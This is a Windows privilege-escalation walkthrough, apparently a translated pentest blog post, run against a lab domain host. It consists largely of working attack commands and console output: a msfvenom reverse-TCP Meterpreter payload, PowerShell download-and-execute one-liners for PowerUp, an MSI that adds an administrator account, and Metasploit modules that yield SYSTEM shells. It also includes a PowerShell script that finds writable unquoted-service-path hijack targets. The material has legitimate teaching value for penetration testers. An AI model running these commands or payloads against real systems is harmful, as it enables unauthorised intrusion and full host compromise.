Lluna's Pure land.

What is life like when singing to wine?


Internal Network Penetration Testing - Privilege Escalation

0x01. Vulnerability discovery

1. Listing installed patches with WMIC

wmic qfe get Caption,Description,HotFixID,InstalledOn

2. Listing installed patches with msf

First, generate the malicious program with msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6666 -f exe > shell.exe

Start the msf listener

msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.4 yes The listen address (an interface may be specified)
LPORT 6666 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf6 exploit(multi/handler) >

Run the payload on the target to get a shell


[*] Started reverse TCP handler on 192.168.1.4:6666
[*] Sending stage (175174 bytes) to 192.168.1.5
[*] Meterpreter session 5 opened (192.168.1.4:6666 -> 192.168.1.5:49172) at 2021-07-27 04:35:49 -0400

meterpreter >
meterpreter > background
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 meterpreter x86/windows JIYE\Administrator @ WIN7DC1 192.168.1.4:6666 -> 192.168.1.5:49172 (192.168.1.5)

msf6 exploit(multi/handler) >

Use the post/windows/gather/enum_patches module to list the installed hotfixes quickly. It reports what is installed; the missing patches are what you infer by comparing this list against a bulletin database, which is what the next two tools do.

msf6 exploit(multi/handler) > use post/windows/gather/enum_patches
msf6 post(windows/gather/enum_patches) >set session 5
session => 5
msf6 post(windows/gather/enum_patches) > run

[*] Patch list saved to /root/.msf4/loot/20210727044047_default_192.168.1.5_enum_patches_596648.txt
[+] KB2534111 installed on 7/10/2021
[+] KB2999226 installed on 7/10/2021
[+] KB4474419 installed on 7/10/2021
[+] KB976902 installed on 11/21/2010
[*] Post module execution completed
msf6 post(windows/gather/enum_patches) >

Use the post/multi/recon/local_exploit_suggester module to find local exploits that may work. Its checks are mostly version-based, so "appears to be vulnerable" marks a candidate to verify rather than a confirmed finding; note that the run below was interrupted before all 38 checks had completed.

msf6 post(windows/gather/enum_patches) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 5
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.1.5 - Collecting local exploits for x86/windows...
[*] 192.168.1.5 - 38 exploit checks are being tried...
[+] 192.168.1.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[-] 192.168.1.5 - Post interrupted by the console user
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >

3. Finding vulnerabilities with Windows Exploit Suggester

First, download the bulletin database

E:\>python2 windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2021-07-27-mssb.xls
[*] done

E:\>

Install the xlrd package (the script is Python 2 and reads the .xls database through xlrd; the version is pinned to the one the script is known to work with)

pip2 install xlrd==1.2.0

Run the check. systeminfo.txt is the output of `systeminfo` run on the target and copied back; the script compares the hotfixes listed there against the bulletin database:

E:\>python2 windows-exploit-suggester.py -d 2021-07-27-mssb.xls -i systeminfo.txt > out.txt

View out.txt. Note that it identifies the host as 64-bit, while the Meterpreter session above is x86; keep that in mind when picking exploits later.

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 4 hotfix(es) against the 386 potential bulletins(s) with a database of 137 known exploits
[*] there are now 386 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*]
[E] MS16-059: Security Update for Windows Media Center (3150220) - Important
[*] https://www.exploit-db.com/exploits/39805/ -- Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056)
[*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 Java­Script­Stack­Walker memory corruption
[*]
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
[*]
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*]
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[*]
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*]
[E] MS15-134: Security Update for Windows Media Center to Address Remote Code Execution (3108669) - Important
[*] https://www.exploit-db.com/exploits/38911/ -- Microsoft Windows Media Center Library Parsing RCE Vulnerability aka self-executing' MCL File, PoC
[*] https://www.exploit-db.com/exploits/38912/ -- Microsoft Windows Media Center Link File Incorrectly Resolved Reference, PoC
[*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object - 'els.dll' DLL Planting (MS15-134)
[*] https://code.google.com/p/google-security-research/issues/detail?id=514 -- Microsoft Office / COM Object DLL Planting with els.dll
[*]
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC
[*]
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
[*]
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC
[*]
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
[*]
[M] MS15-100: Vulnerability in Windows Media Center Could Allow Remote Code Execution (3087918) - Important
[*] https://www.exploit-db.com/exploits/38195/ -- MS15-100 Microsoft Windows Media Center MCL Vulnerability, MSF
[*] https://www.exploit-db.com/exploits/38151/ -- Windows Media Center - Command Execution (MS15-100), PoC
[*]
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[*] https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC
[*]
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[*] https://www.exploit-db.com/exploits/38222/ -- MS15-078 Microsoft Windows Font Driver Buffer Overflow
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[*] http://www.exploit-db.com/exploits/35661/ -- Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl), PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[*] http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
[*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[*] done

4. Checking vulnerabilities with the Sherlock.ps1 script

First, upload it to the target host

meterpreter > upload Sherlock.ps1 C:
[*] uploading : /root/Sherlock.ps1 -> C:
[*] uploaded : /root/Sherlock.ps1 -> C:\Sherlock.ps1
meterpreter >

Execute the script on the target host

PS C:\> Import-Module .\Sherlock
PS C:\> Find-AllVulns > out.txt

View out.txt. Sherlock only covers the handful of local exploits it has signatures for and judges them from driver file versions, so "Appears Vulnerable" is a candidate to verify; the "Not supported on 64-bit systems" entries describe the exploit, not the patch state of the host.


Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Not Supported on single-core systems

Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable


0x02. Exploiting Windows configuration errors

1. Misconfigured service permissions

Windows services run long-lived executables, usually as LocalSystem. If you can modify a service's configuration, or the binary it launches, replacing that binary with a malicious one (or pointing the service at one) runs your code as SYSTEM.

Service not running: replace the binary with the malicious program, then start the service.
Service running and cannot be stopped: this is the common case in practice; use DLL hijacking against the service process and try to get the service restarted (or wait for a reboot if it is Auto-start).

01. Checking for service vulnerabilities with the PowerUp.ps1 script

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('./PowerUp.ps1'); Invoke-AllChecks"

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

02. Privilege escalation with msf's exploit/windows/local/service_permissions module

meterpreter > shell
Process 2956 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\administrator\Desktop>whoami
whoami
jiye\administrator

C:\Users\administrator\Desktop>exit
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/service_permissions
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/service_permissions) >
msf6 exploit(windows/local/service_permissions) > set session 1
session => 1
msf6 exploit(windows/local/service_permissions) > options

Module options (exploit/windows/local/service_permissions):

Name Current Setting Required Description
---- --------------- -------- -----------
AGGRESSIVE false no Exploit as many services as possible (dangerous)
SESSION 1 yes The session to run this module on.
TIMEOUT 10 yes Timeout for WMI command in seconds


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic


msf6 exploit(windows/local/service_permissions) > run

[*] Started reverse TCP handler on 192.168.1.4:4444
[-] The registry technique will be skipped because the payload architecture does not match the native system architecture
[*] Trying to add a new service...
[*] Created service... CnoKgsk
[+] Service should be started! Enjoy your new SYSTEM meterpreter session.
[*] Sending stage (175174 bytes) to 192.168.1.5
[*] Meterpreter session 2 opened (192.168.1.4:4444 -> 192.168.1.5:49169) at 2021-07-28 09:16:46 -0400

meterpreter > shell
Process 2832 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

2. Privilege escalation via the AlwaysInstallElevated registry key

Cause: the Windows Installer policy "Always install with elevated privileges" is enabled. It has to be enabled in both of the locations below; each one sets AlwaysInstallElevated = 1 under SOFTWARE\Policies\Microsoft\Windows\Installer (in HKLM and HKCU respectively), and msiexec then installs any MSI package as SYSTEM, regardless of who runs it.

Run gpedit.msc > Computer Configuration > Administrative Templates > Windows Components > Windows Installer

Run gpedit.msc > User Configuration > Administrative Templates > Windows Components > Windows Installer

01. Exploitation with PowerUp

PowerUp's Get-RegistryAlwaysInstallElevated function checks whether both registry keys are set;
if they are, MSI packages are installed with SYSTEM privileges.

# Check whether the keys are set
powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('./PowerUp.ps1');Get-RegistryAlwaysInstallElevated
# Run Write-UserAddMSI to generate UserAdd.msi, which adds a local administrator account when installed
powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('./PowerUp.ps1');Write-UserAddMSI
# Install the MSI
msiexec /quiet /qn /i UserAdd.msi

02. Privilege escalation with msf's exploit/windows/local/always_install_elevated module

msf6 exploit(windows/local/service_permissions) > use exploit/windows/local/always_install_elevated 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set session 1
session => 1
msf6 exploit(windows/local/always_install_elevated) > options

Module options (exploit/windows/local/always_install_elevated):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows


msf6 exploit(windows/local/always_install_elevated) > run

[*] Started reverse TCP handler on 192.168.1.4:4444
[*] Sending stage (175174 bytes) to 192.168.1.5
[*] Meterpreter session 3 opened (192.168.1.4:4444 -> 192.168.1.5:49171) at 2021-07-28 09:43:34 -0400

meterpreter > shell
Process 936 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

3. Trusted Service Paths (unquoted service paths)

The Trusted Service Paths issue comes from how Windows resolves an executable path. Put simply: if a service's binary path contains spaces and is not enclosed in double quotes, Windows cannot tell where the path ends and the arguments begin, so the service is potentially vulnerable.

For example, for the path C:\Program Files\Some Folder\Service.exe, the service control manager tries each prefix that ends at a space as a candidate executable, in order, until one exists.

In this case it tries to execute, in order:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

If we can place a malicious program named Program.exe in the root of C:, it may be executed with SYSTEM privileges the next time the service starts, which is the escalation. Two caveats: on a default installation a standard user cannot create files in the root of C: or in Program Files (creating a folder in the root is allowed, a file is not), so the finding is real only where a third-party installation directory has weak ACLs, which is what the icacls check below decides; and the service must run as LocalSystem and be restartable by you (or be Auto-start and the host rebooted) for the hijack to pay off.

01. Testing whether the vulnerability exists

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """    # auto-start services whose path is not quoted (and is outside C:\Windows)

icacls "C:\Program Files (x86)"    # check whether the target folder is writable
Everyone: every user has the listed permission on the folder, i.e. all users can modify it
(M): modify
(F): full control
(CI): container inherit, subfolders inherit the ACE
(OI): object inherit, files inherit the ACE
Everyone:(OI)(CI)(F): every user can read, write, delete and execute the folder's files and delete its subdirectories (look for (M), (F) or (W) granted to Everyone, Users, Authenticated Users or BUILTIN\Users)

Once the vulnerability is confirmed, rename the program you want to run to match the candidate path (Program.exe for the first one above, Some.exe for the second), place it in the vulnerable, writable directory, and restart the service:
sc stop service_name
sc start service_name
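The wmic and icacls checks above can be folded into one script. What follows is an added example, not code from the original post or from PowerUp: it enumerates services whose image path is unquoted and contains a space, derives the executables Windows would try before the real one (the C:\Program.exe, C:\Program Files\Some.exe sequence from the explanation above), and tests whether the current user can actually create a file in each of those directories. The function names are mine; it assumes PowerShell 3.0 or later and runs in the low-privileged context you already have.

```powershell
# Added example: find unquoted service paths and test whether the hijack
# directories are writable by the current user. Not from the original post.
# Assumes PowerShell 3.0+ (for [PSCustomObject]) and Win32_Service via WMI.

function Get-UnquotedServicePath {
    # Services whose ImagePath is unquoted and has a space inside the executable path
    Get-WmiObject -Class Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path -or $path.TrimStart().StartsWith('"')) { return }   # quoted or empty: safe
        # Keep only the executable (drop arguments such as "-k netsvcs")
        if ($path -match '^(.*?\.exe)') { $exe = $Matches[1] } else { return }
        if ($exe -notmatch ' ') { return }   # no space in the executable path: nothing to hijack
        [PSCustomObject]@{
            Name      = $_.Name
            StartMode = $_.StartMode
            RunsAs    = $_.StartName          # LocalSystem means a hijack yields SYSTEM
            ImagePath = $exe
        }
    }
}

function Get-HijackCandidate {
    # For C:\Program Files\Some Folder\Service.exe, CreateProcess tries
    # C:\Program.exe, then C:\Program Files\Some.exe, then the real file.
    param([Parameter(Mandatory)][string]$ImagePath)
    $parts = $ImagePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
        [PSCustomObject]@{
            Candidate = $candidate
            Directory = Split-Path -Path $candidate -Parent
        }
    }
}

function Test-DirectoryWritable {
    # Actually create (and immediately delete) a file: this evaluates the effective
    # ACL including group membership, which reading the ACL with Get-Acl would not.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path -Path $Path -ChildPath ('~' + [guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

# Report: one row per service/candidate pair. Act on rows where Writable is True,
# RunsAs is LocalSystem and StartMode is Auto (or you hold start/stop rights on it).
Get-UnquotedServicePath | ForEach-Object {
    $svc = $_
    Get-HijackCandidate -ImagePath $svc.ImagePath | ForEach-Object {
        [PSCustomObject]@{
            Service   = $svc.Name
            RunsAs    = $svc.RunsAs
            StartMode = $svc.StartMode
            Candidate = $_.Candidate
            Writable  = Test-DirectoryWritable -Path $_.Directory
        }
    }
} | Format-Table -AutoSize
```

Rows with Writable True against a service that runs as LocalSystem are the real findings. Whether you can restart the service yourself is a separate check: `sc sdshow <name>` prints its security descriptor, and the accesschk tool used later on this page shows the same thing readably (`accesschk.exe -ucqv <name>`); without SERVICE_START and SERVICE_STOP you drop the binary and wait for a reboot of an Auto-start service. The probe file is written and removed on purpose rather than parsing the ACL, because a denied write is the only answer that matters and the file system computes it correctly for nested groups and deny ACEs.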

02. Exploitation with msf

msf6 exploit(multi/handler) > use exploit/windows/local/trusted_service_path 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/trusted_service_path) > set session 1
session => 1
msf6 exploit(windows/local/trusted_service_path) > options

Module options (exploit/windows/local/trusted_service_path):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows


msf6 exploit(windows/local/trusted_service_path) > run

[-] The Windows::WindowsServices mixin is deprecated, use Windows::Services instead
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] Finding a vulnerable service...
[-] Exploit failed: NameError undefined local variable or method `service_list' for #<Msf::Modules::Exploit__Windows__Local__Trusted_service_path::Metasploit3:0x00007fca71a280d0>
[*] Exploit completed, but no session was created.

The exploit did not succeed here. The NameError (`service_list` undefined) is a bug in this build of the module, raised right after its own deprecation warning about the WindowsServices mixin; it says nothing about whether the host has a vulnerable service, so fall back to the manual wmic/icacls check above. Also note the message from the service_permissions run earlier, "The registry technique will be skipped because the payload architecture does not match the native system architecture": the session is a 32-bit Meterpreter (x86/windows) on a 64-bit host (Windows Exploit Suggester identified "Windows 7 SP1 64-bit", and Sherlock reported several exploits as "Not supported on 64-bit systems"). Generate an x64 payload (windows/x64/meterpreter/reverse_tcp) or migrate into a 64-bit process before running local exploit modules; otherwise the checks and techniques that depend on the native architecture are skipped or fail.

4. Unattended installation answer files

Answer files left behind by Windows Setup or sysprep (Unattend.xml, sysprep.xml, typically under C:\Windows\Panther or C:\Windows\System32\Sysprep) can contain local administrator or AutoLogon passwords, stored in plain text or Base64.

dir /b /s c:\Unattend.xml    # search the drive for Unattend.xml files

Searching with msf

